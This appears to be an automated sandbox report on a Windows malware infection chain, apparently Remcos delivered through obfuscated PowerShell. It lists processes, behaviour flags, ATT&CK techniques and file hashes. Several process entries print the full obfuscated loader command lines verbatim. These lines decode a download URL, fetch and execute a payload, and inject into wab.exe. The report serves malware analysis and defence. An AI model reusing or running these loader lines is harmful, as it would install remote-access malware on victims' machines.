{Lrerkollegierne (nosologies 'Nvenp$Miilig,ostslRu.eio Uns bIndmaa P.ptlPr.ve:OutbrWhydr,e SerisBrutts Tur eImparlAnden=Nonse$Aftegt FluerGn llu biaueS,rve ') ;Lrerkollegierne $Gentlemanliness;Lrerkollegierne (nosologies 'SkovbSSemimtForpaaPosserAp,mitTuber-DemagSStegolOveroeHetereMelonpNrved mai.f4Notat ');Lrerkollegierne (nosologies 'Misba$Emb lg nlilVelf oTr.vrbKonfeaAyahalWorsh:NonsuNMaskiyTarifbtrapprS nituEpicodHukkedBarnae LandnChroneMo.or1 P nk3 pock2 Lata=genn ( trilTFlosneSekr sFremvtAte o-SlrinPDossyaA.teetRegiohGa.eo A tio$ Sa,iRLach,eS ileeMisapcGomuthSociooEst,b)Bo,tl ') ;Lrerkollegierne (nosologies 'Depor$D mingBa dul PereoEksp,bTeknoa Menol Ekse:divinAK.ndikFolket SkuliRenseeBrn,taMangfvo,tthaRe,ivnOblonc QuineSniver UnadnTapeteUngli=Absol$ eazgSoloslForsvoVis.abMikkiaPredolElmie:AphesI rdgrnMikelv,ssoci BlactBroddeLaina+Febru+ ,erl% Opla$OrdreFtilbyiM.ltigHandeuPrecorversalB.arbiSp,ydgBaventHe.al. Skruc.manuoCoosiuRefu nEtiketC mot ') ;$kammermusikken=$Figurligt[$Aktieavancerne];}$unembowered=292446;$Nonprosperously=29824;Lrerkollegierne (nosologies ' ,ilj$Antiig N nmlSpanco urtib.rvyeaIndtelFrute: ToxiDZerotiHy.rof T.aitBenmeoRifisnUnt egFortheLitzir K ureOrdre ,kuau=Dry,t conciG Unsue osehtEn.ou-CatecCKalveoiso onAnsart StaveaxtrenFlumatbimas ribo$VrktjRRealkeUnf.meFlidec EksthAmlonoSpi.e ');Lrerkollegierne (nosologies ' Ste.$Ly,regAdmitl Chaso WaulbMyeloa.eroslSjals:C,rcuB,rdeieS aresDrfyliLoesngSprydtHenaaiWelshgPaadmePanthlSyntosLirate Nrahn Bhag Trekv=Klode Skues[ CoccSCarpoyS,onss crimtAmalgeFreebmCurso.PhotoCPrio oFrisrnVandkvStrane K itr UnwrtEldor]S ile: O.ci:SuperFstykerLydbgoSmalnmRe.raBNachgaTynd s,uleeeKa.ed6lus e4SemidSPe get anc,r TheriNewfonFilifgRaadh(Pa an$RecarDMicroiAf,oefSystetAfsteoDiplon ForbgMinareI.perrBeatgeVelve)Asbes ');Lrerkollegierne (nosologies 'Snigm$AfvangLute.lCrayoo .verb MuleaG amolBar.e:Lyse.CSco,ehVipsteBroenmDusiniRapa lTraceurappem SalgiBrevsnNonaueFry.ssForurc EngreD quen heetUnwar Reseq=Lapp Incit[ StedSBlodpyPrimesPle,etSyllaeRamarmAutom.cor eTMoraleAc.uaxNo cotA.jud.PurliECel,in tabec .ormo tru.ddeteriHindrn velsgUnton]Velig:Zelin:Rast,AExpatS BetoCDacr ITackiIBrnek. RecoG F lseAlloct asteS PlagtMilitrMerkaiJernanWeedlg Ove.( Eval$EnlayBLandoeParafs Volci HjemgWit.ot SteliS.inggrenteeUhenslStudisF,mbreNoternBesyn)Vascu ');Lrerkollegierne (nosologies 'arrak$ YellgStonelBrainovr,epb DanmaSto el Klip: K.ltSCalcatUige.aW oretVinkooJensps tr,cpThorno BromrTon.ae .vad=Waste$,iannCSkrmth,onsueryghvmIndskiThalalbryggu ompumThuriiTrietn LongeIndflsprestc,lmaheHermenMusdot Bahr.frugtsHypoauDeflab ChapsInfortApicir Hus,idispinOrddegParab(Efte.$ SpiruUnbefnDiscre HypemConsib.andloNonpawDampnef,rmar,ithyeKommedUford, siem$piperNForm oAfp,vnBuc,fpThonfr WintogrievsPopulp ElfleUndusrForldo CanouPsykos sen lInddayUdskr)Regas ');Lrerkollegierne $Statospore;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtastningernes.Voi && echo t"
8⤵
PID:4616

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3284

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\qydsfb.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Housewrecker='Sub';$Housewrecker+='strin';$Devoteeism = 1;$Housewrecker+='g';Function Swilled($Skamferingernes220){$Elokvent=$Skamferingernes220.Length-$Devoteeism;For($Rottefrit=5;$Rottefrit -lt $Elokvent;$Rottefrit+=6){$Agnostiker186+=$Skamferingernes220.$Housewrecker.Invoke( $Rottefrit, $Devoteeism);}$Agnostiker186;}function Dentata($Tortoises){ . ($Rabarberkvarterer) ($Tortoises);}$Filthified194=Swilled 'KolacMminiroGods zReenuiUddellmetodl,rchpasapou/In sp5Fo de.Clo r0Tig,e Ovato(.ologWVarmeiAl isnBasked Sa,do DispwCatawsKurse AnalyN Edi TMilie P,yt1,nsha0Multi.colla0 Outs;Tekst AfsvWuvejriServinEk po6Anthe4int.r; Skr, Genmax Ingr6Over 4Under;Bou,g .permrHeksevTomat:Inieb1Udtry2Gylde1T gte.Komma0Since)Alumi StenGVoldgeindv cI cenk R.nto,mper/Vens,2 Pr,c0 agg1T.edj0Ba ls0Pro e1Hekse0Kron 1 Part Phil.FSlavoiForflrtenaceNon lfE tero MacrxM ure/Heter1entre2Viden1vagin.T lsy0p eci ';$Tenorite=Swilled 'Re viUPallesSnappeHermerPaste-SkaanAachilgThymaeTuckenSalgstFjerb ';$Heltindes=Swilled 'ViskehPengetWays tPhysep hitesJdeki:Livel/Benga/Meth.tPerr a Se.rtPhlegsImbareSandwlSkalpeM,sbocsp rstEmigrr,eneroKagemn Mil iForebc EstrsFremd. Berec AlymoAnven.Den mzC.nvawSleyi/Nons.sSt dsdIn fa/ Ko.fKRein rAfskiuS.ippb.yggeiPy,am.Tigerm.oltasCau.eomagni ';$Elkslip=Swilled 'Stolz> Forp ';$Rabarberkvarterer=Swilled 'a endiNoncoeRedefxCrapu ';$Handelsuddannet123='Egyptologernes';$faksimilet = Swilled 'Elekte B nkc NglehKomm.oPtyal edva%SkomaaBlottpSpisepAfsl.d BuffaFladptHe.mea.rmin% ffe\EfterH BirkeI,divmB nzaaCrumbtWeedeoVerdebAtolmropretaResonnBispec Pr,shC.rkuiMuni.aTilsytDiscoe Pho..NdvrgE HydrnCowagfSad m omeo&Uvaer&Flerv MuseeAfridc I.deh.oxalo Nrin C,ntat Oron ';Dentata (Swilled ' Syst$Fedlag StralIsmejoMaksibZygota annelStipi:Stet,T Middh rd peSpildrRep ei Bolia WititShindrPorioiStenscSu ersS eez=Lufth(HacktcJacuamMariodTorst Ref,r/PentycPromi P rio$kommef oresa Koekk Fe asUnderikonf mKageri abetlimpededisaltpecul)Lunkh ');Dentata (Swilled ' Amby$UgletgNgstelAuto.oMa onb TenoaDu lllB,dui:StrabFTyksarsp,rmiSanggtCob,eaMejsegGu,phe.embol Coges lerbeOversnglsnisSemi.=Blinu$leverH GravebegrelBlosttRedouiRoyalnLiniedsy tee Samms Hali.G nuds .gohpEvenwlNonfeiudpibtU.kra(Studi$istanEK.efol dbrik RaabsRaggel xtroiKaolipPetre)nond ');$Heltindes=$Fritagelsens[0];$Epitendineum= (Swilled 'Iltni$ Wrong s colLanceoUngivb FrucaCachilOplft:SnarlT rogeMuscikdaa,lnViv,si ShopkPr,pou HermmPolysuRapsedDip od ForhaPhasmnUnex,nNon.ce Fanatsp,en=CytomNforlieUnderwsi,on-S,atuOOmvurbLegiojaba,te HidfcDeltktHusdy udleSE.ployNosocsAllegtLejnieSubpim Svve.ImmunNWatcheBar,tt rill.VinduWBla,heBr.inbGaldeCCrosslBrulyiAnimeeCirkunFaunat');$Epitendineum+=$Theriatrics[1];Dentata ($Epitendineum);Dentata (Swilled 'Pre,e$ UddaTSurfee ScrekaitutnNo opiglendkParaluInd.rmSuperuhumerdkalved Si va,ation Re,unskovlePomfrt Kha . tweaHRaadzePressaTassadPlurae,ceitr Frekstedde[ K it$uvantTA,adeeVirkenfortpoV.nosrFllesiDip otMale.e Pr,s]Energ=Gylpe$Zo.meFCy luiincublp,raltApparhS.aali TrolfAvlsfiGetateOrdnedT ldk1Excen9Bhmnd4Colea ');$Familietraditionernes=Swilled 'Semie$ KatcTMenageB rdkkRen en Ta,si GroukElectuGenhumE.umeuDormid.lectdFrag,akundenCl.manCleareSelvbtAlleg.PinniDDeceioElusowBremsnmicrolP ncto Sp.faTab.ld S.ahFUppisiPeritlVaccieUncoa(Karbu$Ho,olH Phote StuflparamtE ergiWorktn Cambdunil,eDrak.s .rom,Prior$ca,ilF EnearFjerde,ompumMucidmBagateReverlCoc,uiNond,gMagmatFolke)Pumph ';$Fremmeligt=$Theriatrics[0];Dentata (Swilled 'Sphae$UncolgEgenvlEsopho nterbSup ra ranul Pigg:Da aeT Acona U,derAtomhvBel ae spellImpediYeme,gtelttePre arG.niteFe,th1Fje n1Pe.so8afs.u=Ooste(.onseTEmotie RecisAvifat nclo- UniaPPlasmaD.saitgesanh Notu Sours$Cou.tF FlybrFa speTheremTermimS rupe Embrl Bra,iUlivsg DanstTiara)K ngr ');while (!$Tarveligere118) {Dentata (Swilled 'Dekli$Knospg Eyrel Kr,mo Suprbslew.aerythlOpgiv:S resANoncrl Unenk Uneaa Dogll MonaiDitrizKr,mie.pedasFrugt=Preda$.ystetdecatrBitteuDe,ineVak.p ') ;Dentata $Familietraditionernes;Dentata (Swilled ',rfisSC mpetTartra,elisr HjretLeopo-,gedaS.emaslspa,ieAnkese SyripRejuv Virks4Ind g ');Dentata (Swilled 'T nsu$ ,alagS.artlTagetoHylozb Pa tanonvvlKonst:ContrT Frema Skjor KlarvMisfoeeluanlHenstiJvn.ggTotone.lererJe nbeMesep1Stere1H per8Gift = blo,(SculpTPo ycePunaisResertu.nar-Para.P legnaStraet Pse hNv,in .ispu$BesaaFOutfrrOverieReargmPa.cimBge reSynftlBestiiZooxagRoadwtBrahm)Ubegr ') ;Dentata (Swilled ' excr$ laygg ,ogel,orngoBvedebS,orba MivrlTitra: jlesAbeboefF,rhokProten S,ppaObstrp Pro pS.ncreUdhuldSho,tecolinsU,igt= chur$ o vagCapealPropooTeutobFagmeaDves.lFi,ke: P.ngBGen.reLinchfSubeqoKvaler DegrdSuperr T udi Tvrvn KurtgSke usSnootmLeveriSafthdPennelOpladeWalycrKvartncarnaeTilr.sBro h+F,tti+Prest%Domst$bas.dF a,orrForbriUdflyt askiaRestagFan,aeH,reul,inges DomaesupernTank sp esk.Lancicafdr oEfteru.uffin Stact ucke ') ;$Heltindes=$Fritagelsens[$Afknappedes];}$Enkindles=304898;$Frifunden=29093;Dentata (Swilled 'Farid$Dar.egRh,sulEfteroPennab O ova M,galSup r: A.trCHudore OversOllasuCy,torNedbra Dho.lLivsm Colle=Idiot M,chaG onineUopretUnarr-SklveCAcronoNonatn.dmont ProcePresenIncestInter kali$ KislFForflrTotaleudelamForvnm SpeceanstrlFre.li RequgNulputAse.s ');Dentata (Swilled ' ell$Radi.g DeltlClintobrspab .robaGrasslBadut:,ndocSSpredkF.brouGotc nCertiksteree Ske.r DrifnIntraeSedes Opga,=Begon Carb[AmnioSContay Sydns,achytMesoteTrkkem.issi.EnosiC InfooW.ttonDemisv F mieInte r,hilotZoril]Upbuo:Hexas:AtlanFGe nerSjusko LimmmOv rsB nbeaAnti,sjackeePl,ur6Hepto4A renSAcceptNeutrrRevo,iManusnDecimgGinnl(Langh$Bes,oCTrawleOli,tsK emeuUnfelrTunemaTubi lM hog)Gunst ');Dentata (Swilled 'Livsb$MentagForbelReinsoVend.bCant aEctotlJubil:LdepoO .astpMbytegKlager Divie ,avlt Si,cs.ivst furmi=incom .edag[RegenSOmrahyAuslas EasttM.croeStraamErind.Midt,T Sto eFlo.ixbort tE,omo. MedmEStra.n abaicI,teroF zysd Lreri ,vern JvnbgFl,ke]Fakul:Overg:KonstAOversSOrdodCPelteI angIChoks.OrkesGForhae Foxft,ateaSNoneptF.dstrInte,iSissinSidelgBongr(Prv,l$SammeS loadkAngeluEnehen RespkUnarmebeskfrSwimmn xceeGuaci)Hyldn ');Dentata (Swilled 'Smrfe$ Hg yg HeadlMaaleoKommobSpor aU.eselMer.t:brachDSygeme klipcEnanto InterUndera .fbrtNoteriMi lioSnebln nbeiiFon,usMurertSame,=Solid$InterO SandpT.toagSimplrBlysteAmitotVideosAutot. Vip.sAphanu.ampabEskapsAcylatSjuftrNjagti AeronCli,cgleksi(Ov.rc$SemihEFishbnFa,tak Cry.iAngionLispcdPurolltreleeL,mousMisal,Foedt$AvifaFFescur BejaiGuarafBau.ouHvsesnTwatcd SynaeAkternStorj) Ob e ');Dentata $Decorationist;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hematobranchiate.Enf && echo t"
7⤵
PID:4340

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Housewrecker='Sub';$Housewrecker+='strin';$Devoteeism = 1;$Housewrecker+='g';Function Swilled($Skamferingernes220){$Elokvent=$Skamferingernes220.Length-$Devoteeism;For($Rottefrit=5;$Rottefrit -lt $Elokvent;$Rottefrit+=6){$Agnostiker186+=$Skamferingernes220.$Housewrecker.Invoke( $Rottefrit, $Devoteeism);}$Agnostiker186;}function Dentata($Tortoises){ . ($Rabarberkvarterer) ($Tortoises);}$Filthified194=Swilled 'KolacMminiroGods zReenuiUddellmetodl,rchpasapou/In sp5Fo de.Clo r0Tig,e Ovato(.ologWVarmeiAl isnBasked Sa,do DispwCatawsKurse AnalyN Edi TMilie P,yt1,nsha0Multi.colla0 Outs;Tekst AfsvWuvejriServinEk po6Anthe4int.r; Skr, Genmax Ingr6Over 4Under;Bou,g .permrHeksevTomat:Inieb1Udtry2Gylde1T gte.Komma0Since)Alumi StenGVoldgeindv cI cenk R.nto,mper/Vens,2 Pr,c0 agg1T.edj0Ba ls0Pro e1Hekse0Kron 1 Part Phil.FSlavoiForflrtenaceNon lfE tero MacrxM ure/Heter1entre2Viden1vagin.T lsy0p eci ';$Tenorite=Swilled 'Re viUPallesSnappeHermerPaste-SkaanAachilgThymaeTuckenSalgstFjerb ';$Heltindes=Swilled 'ViskehPengetWays tPhysep hitesJdeki:Livel/Benga/Meth.tPerr a Se.rtPhlegsImbareSandwlSkalpeM,sbocsp rstEmigrr,eneroKagemn Mil iForebc EstrsFremd. Berec AlymoAnven.Den mzC.nvawSleyi/Nons.sSt dsdIn fa/ Ko.fKRein rAfskiuS.ippb.yggeiPy,am.Tigerm.oltasCau.eomagni ';$Elkslip=Swilled 'Stolz> Forp ';$Rabarberkvarterer=Swilled 'a endiNoncoeRedefxCrapu ';$Handelsuddannet123='Egyptologernes';$faksimilet = Swilled 'Elekte B nkc NglehKomm.oPtyal edva%SkomaaBlottpSpisepAfsl.d BuffaFladptHe.mea.rmin% ffe\EfterH BirkeI,divmB nzaaCrumbtWeedeoVerdebAtolmropretaResonnBispec Pr,shC.rkuiMuni.aTilsytDiscoe Pho..NdvrgE HydrnCowagfSad m omeo&Uvaer&Flerv MuseeAfridc I.deh.oxalo Nrin C,ntat Oron ';Dentata (Swilled ' Syst$Fedlag StralIsmejoMaksibZygota annelStipi:Stet,T Middh rd peSpildrRep ei Bolia WititShindrPorioiStenscSu ersS eez=Lufth(HacktcJacuamMariodTorst Ref,r/PentycPromi P rio$kommef oresa Koekk Fe asUnderikonf mKageri abetlimpededisaltpecul)Lunkh ');Dentata (Swilled ' Amby$UgletgNgstelAuto.oMa onb TenoaDu lllB,dui:StrabFTyksarsp,rmiSanggtCob,eaMejsegGu,phe.embol Coges lerbeOversnglsnisSemi.=Blinu$leverH GravebegrelBlosttRedouiRoyalnLiniedsy tee Samms Hali.G nuds .gohpEvenwlNonfeiudpibtU.kra(Studi$istanEK.efol dbrik RaabsRaggel xtroiKaolipPetre)nond ');$Heltindes=$Fritagelsens[0];$Epitendineum= (Swilled 'Iltni$ Wrong s colLanceoUngivb FrucaCachilOplft:SnarlT rogeMuscikdaa,lnViv,si ShopkPr,pou HermmPolysuRapsedDip od ForhaPhasmnUnex,nNon.ce Fanatsp,en=CytomNforlieUnderwsi,on-S,atuOOmvurbLegiojaba,te HidfcDeltktHusdy udleSE.ployNosocsAllegtLejnieSubpim Svve.ImmunNWatcheBar,tt rill.VinduWBla,heBr.inbGaldeCCrosslBrulyiAnimeeCirkunFaunat');$Epitendineum+=$Theriatrics[1];Dentata ($Epitendineum);Dentata (Swilled 'Pre,e$ UddaTSurfee ScrekaitutnNo opiglendkParaluInd.rmSuperuhumerdkalved Si va,ation Re,unskovlePomfrt Kha . tweaHRaadzePressaTassadPlurae,ceitr Frekstedde[ K it$uvantTA,adeeVirkenfortpoV.nosrFllesiDip otMale.e Pr,s]Energ=Gylpe$Zo.meFCy luiincublp,raltApparhS.aali TrolfAvlsfiGetateOrdnedT ldk1Excen9Bhmnd4Colea ');$Familietraditionernes=Swilled 'Semie$ KatcTMenageB rdkkRen en Ta,si GroukElectuGenhumE.umeuDormid.lectdFrag,akundenCl.manCleareSelvbtAlleg.PinniDDeceioElusowBremsnmicrolP ncto Sp.faTab.ld S.ahFUppisiPeritlVaccieUncoa(Karbu$Ho,olH Phote StuflparamtE ergiWorktn Cambdunil,eDrak.s .rom,Prior$ca,ilF EnearFjerde,ompumMucidmBagateReverlCoc,uiNond,gMagmatFolke)Pumph ';$Fremmeligt=$Theriatrics[0];Dentata (Swilled 'Sphae$UncolgEgenvlEsopho nterbSup ra ranul Pigg:Da aeT Acona U,derAtomhvBel ae spellImpediYeme,gtelttePre arG.niteFe,th1Fje n1Pe.so8afs.u=Ooste(.onseTEmotie RecisAvifat nclo- UniaPPlasmaD.saitgesanh Notu Sours$Cou.tF FlybrFa speTheremTermimS rupe Embrl Bra,iUlivsg DanstTiara)K ngr ');while (!$Tarveligere118) {Dentata (Swilled 'Dekli$Knospg Eyrel Kr,mo Suprbslew.aerythlOpgiv:S resANoncrl Unenk Uneaa Dogll MonaiDitrizKr,mie.pedasFrugt=Preda$.ystetdecatrBitteuDe,ineVak.p ') ;Dentata $Familietraditionernes;Dentata (Swilled ',rfisSC mpetTartra,elisr HjretLeopo-,gedaS.emaslspa,ieAnkese SyripRejuv Virks4Ind g ');Dentata (Swilled 'T nsu$ ,alagS.artlTagetoHylozb Pa tanonvvlKonst:ContrT Frema Skjor KlarvMisfoeeluanlHenstiJvn.ggTotone.lererJe nbeMesep1Stere1H per8Gift = blo,(SculpTPo ycePunaisResertu.nar-Para.P legnaStraet Pse hNv,in .ispu$BesaaFOutfrrOverieReargmPa.cimBge reSynftlBestiiZooxagRoadwtBrahm)Ubegr ') ;Dentata (Swilled ' excr$ laygg ,ogel,orngoBvedebS,orba MivrlTitra: jlesAbeboefF,rhokProten S,ppaObstrp Pro pS.ncreUdhuldSho,tecolinsU,igt= chur$ o vagCapealPropooTeutobFagmeaDves.lFi,ke: P.ngBGen.reLinchfSubeqoKvaler DegrdSuperr T udi Tvrvn KurtgSke usSnootmLeveriSafthdPennelOpladeWalycrKvartncarnaeTilr.sBro h+F,tti+Prest%Domst$bas.dF a,orrForbriUdflyt askiaRestagFan,aeH,reul,inges DomaesupernTank sp esk.Lancicafdr oEfteru.uffin Stact ucke ') ;$Heltindes=$Fritagelsens[$Afknappedes];}$Enkindles=304898;$Frifunden=29093;Dentata (Swilled 'Farid$Dar.egRh,sulEfteroPennab O ova M,galSup r: A.trCHudore OversOllasuCy,torNedbra Dho.lLivsm Colle=Idiot M,chaG onineUopretUnarr-SklveCAcronoNonatn.dmont ProcePresenIncestInter kali$ KislFForflrTotaleudelamForvnm SpeceanstrlFre.li RequgNulputAse.s ');Dentata (Swilled ' ell$Radi.g DeltlClintobrspab .robaGrasslBadut:,ndocSSpredkF.brouGotc nCertiksteree Ske.r DrifnIntraeSedes Opga,=Begon Carb[AmnioSContay Sydns,achytMesoteTrkkem.issi.EnosiC InfooW.ttonDemisv F mieInte r,hilotZoril]Upbuo:Hexas:AtlanFGe nerSjusko LimmmOv rsB nbeaAnti,sjackeePl,ur6Hepto4A renSAcceptNeutrrRevo,iManusnDecimgGinnl(Langh$Bes,oCTrawleOli,tsK emeuUnfelrTunemaTubi lM hog)Gunst ');Dentata (Swilled 'Livsb$MentagForbelReinsoVend.bCant aEctotlJubil:LdepoO .astpMbytegKlager Divie ,avlt Si,cs.ivst furmi=incom .edag[RegenSOmrahyAuslas EasttM.croeStraamErind.Midt,T Sto eFlo.ixbort tE,omo. MedmEStra.n abaicI,teroF zysd Lreri ,vern JvnbgFl,ke]Fakul:Overg:KonstAOversSOrdodCPelteI angIChoks.OrkesGForhae Foxft,ateaSNoneptF.dstrInte,iSissinSidelgBongr(Prv,l$SammeS loadkAngeluEnehen RespkUnarmebeskfrSwimmn xceeGuaci)Hyldn ');Dentata (Swilled 'Smrfe$ Hg yg HeadlMaaleoKommobSpor aU.eselMer.t:brachDSygeme klipcEnanto InterUndera .fbrtNoteriMi lioSnebln nbeiiFon,usMurertSame,=Solid$InterO SandpT.toagSimplrBlysteAmitotVideosAutot. Vip.sAphanu.ampabEskapsAcylatSjuftrNjagti AeronCli,cgleksi(Ov.rc$SemihEFishbnFa,tak Cry.iAngionLispcdPurolltreleeL,mousMisal,Foedt$AvifaFFescur BejaiGuarafBau.ouHvsesnTwatcd SynaeAkternStorj) Ob e ');Dentata $Decorationist;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hematobranchiate.Enf && echo t"
8⤵
PID:116

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5904 -ip 5904
1⤵
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6784 -ip 6784
1⤵
PID:3052

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE
Filesize
86KB

MD5
0a1704e48ff603332eaac935608d3cf1

SHA1
e138d3d481c054a89b85312bfddd2f8a0baf8c1b

SHA256
d9e02af7b220e25f385c71e0a3be4b83203e0673cc1e56fcf02d3e1f0f3774b6

SHA512
7cec7a7c5542e66e347381e9ab5572b2231ab11dac61d9a76bcb7cbd4bd1e86f8169e7840c2e69f93e686cc1834e52cd6b47817b760ea618139a3de64076314f

Download Submit
C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
695e8a8151b869d349056cabfd881b84

SHA1
f3d784485ea07d417a09500dbb461d78f3e9ced6

SHA256
6af60c609073f87f722a48e0427dfe3607d15e0ab97ce03f9a67951640e0d651

SHA512
ce409192727f6198fcae82bbdbfbc3ae79c9a3fbd53e1f489c03499dfe7a04d4ebd79da9d1425f7cb9ce89a076a57a90b27dadc8a25b32fa1de2668d70084c26

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
07fa522c0d75f0d9af896eb5576aec0c

SHA1
d6b609ff0ca98a8e6ca8c6e47ecfc3a6ded2e1a7

SHA256
d92df520245c619bf6fa7f754cd99dcf654fd415af7d2e7af1f48968e9314995

SHA512
5ec82ee64ac6adc4160f82129a8b59996ab1f98530afa2cd2e0b7f9f44f2ea0e77cf5da2ff68539ff559f33dce3b31015412c597196321749416737c981513f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
4a0f62aa0986f268ea447604326ea837

SHA1
dde073d274261d1499cd697c51ce48d3a1f74bcc

SHA256
5c32f8b8dac0f4ca4aad08b704592814b745941776ca9544317e88a52bafd990

SHA512
1d2401a5388499561a5f665eeb09c8bf416ec60190855dd74883d0e5705aed66d7d6c5db7764197f915f34f34bd2d74d441f09aa889b46086fd3251c0e1482bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
c4bdc6f09c2d7f359a7e9c4280e17e70

SHA1
f0eb30d4d6dbfe6cac433670c37dcd324a82bda1

SHA256
d86f272629cf4883cce77f47efb2602931fcbee71e7237d67fae8455ee26b331

SHA512
7b5026bda50cb94e83a4e3da5dd17cd331c587cb34269e743707e2dd4ee089a36a49492d96a443db79387305dff8842d2dc93ad527b92235a30eba81207e540f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
c8065dd0875206b3bc83e9e0a70028b7

SHA1
c3e5df0b5acf9aa9c5b652d1e914f91abb74a176

SHA256
5963948b2453fbec0df9f95670cd3721ad1549d2e6693738bb0b35b2ccbae02d

SHA512
d5046288ebbab273c35915baad0e3d713cfac69afe03139170dce84aa3facf3ff547024521dd81c6b937d1afc504ed410c334c05b8efb4250cc65d60b24636fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1536159346e9a2061e905bb38ac9fd35

SHA1
eff17db4721dc0add117ed399b839130d27675d4

SHA256
6b0eebfc544130c7a8f7d0e45c8e0b86748c13b528bc9948f216a76d8be2b88f

SHA512
fab6f66ac2bc68e2a82199da2519c7aae2d629603450175b69336097111e57f49fbea8b3903f7a106150032d8e5c653a90f681a10d7be668bff2bcdb798eb4ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\wab.exe
Filesize
464KB

MD5
72ad21d191b58842334d32a381ea7fa8

SHA1
f7375f09855a7bce9f7a152c75e84aac69caf828

SHA256
87abfab7bf5e213fc9e63c7fa39edfa6452eb5f7fdd668cd370d9cf4ea3ef729

SHA512
78662231c7ce0d03374b69dfd32614786dc5bf0c8ad2baadf2143f42bb03bd378632cc457dc414aa7e3d284674cc9151c39f90d71d9a5dd15dba689b2283386d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_swf4l4bw.0ht.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
